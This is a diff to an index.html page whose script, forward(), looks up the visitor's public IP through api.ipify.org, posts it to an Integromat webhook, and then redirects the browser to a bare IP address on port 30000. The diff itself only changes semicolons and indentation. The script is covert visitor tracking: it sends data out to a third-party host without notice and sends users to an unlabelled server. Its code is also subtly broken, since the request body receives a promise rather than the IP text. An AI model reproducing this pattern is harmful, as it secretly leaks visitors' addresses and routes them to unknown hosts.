--- a/index.html
+++ b/index.html
@@ -4,16 +4,16 @@
 
 <script>
 function forward() {
-   var ip = fetch("https://api.ipify.org/")
+   var ip = fetch("https://api.ipify.org/");
    fetch("https://hook.integromat.com/jy2l94o47nss40y2tfnsckjs7glmb5vu", {
-      method: 'POST',
+   	method: 'POST',
       headers: {
       'Content-Type': 'text/plain',
       },
       body: ip
-   })
+   });
    
-   location.replace("http://172.97.176.223:30000")
+   location.replace("http://172.97.176.223:30000");
 }
 </script>
 
